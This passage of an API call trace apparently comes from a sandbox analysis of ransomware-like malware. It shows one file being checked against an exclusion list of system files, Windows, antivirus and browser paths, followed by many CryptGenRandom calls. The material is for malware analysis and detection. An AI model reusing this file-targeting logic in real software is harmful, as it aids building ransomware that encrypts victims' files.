pszSpec="*.dll") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*.lnk") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*.bat") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*.ini") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*.msi") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*.scf") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*pagefile.sys*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*NTUSER.DAT*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*AppData*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\winrar\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\java\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\windows\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\ESET\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\AVG\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\AVIRA\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*Atheros*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*Realtek*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*bootmgr*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*boot*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*boot*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*CONFIG.SYS*") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*IO.SYS*") returned 0 [0148.526] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*MSDOS.SYS*") returned 0 [0148.526] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*NTDETECT.COM*") returned 0 [0148.526] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*ntldr*") returned 0 [0148.526] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*chrome*") returned 0 [0148.526] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*opera*") returned 0 [0148.526] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*firefox*") returned 0 [0148.526] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi", pszSpec="*") returned 1 [0148.526] strlen (_Str="NMoreira") returned 0x8 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom 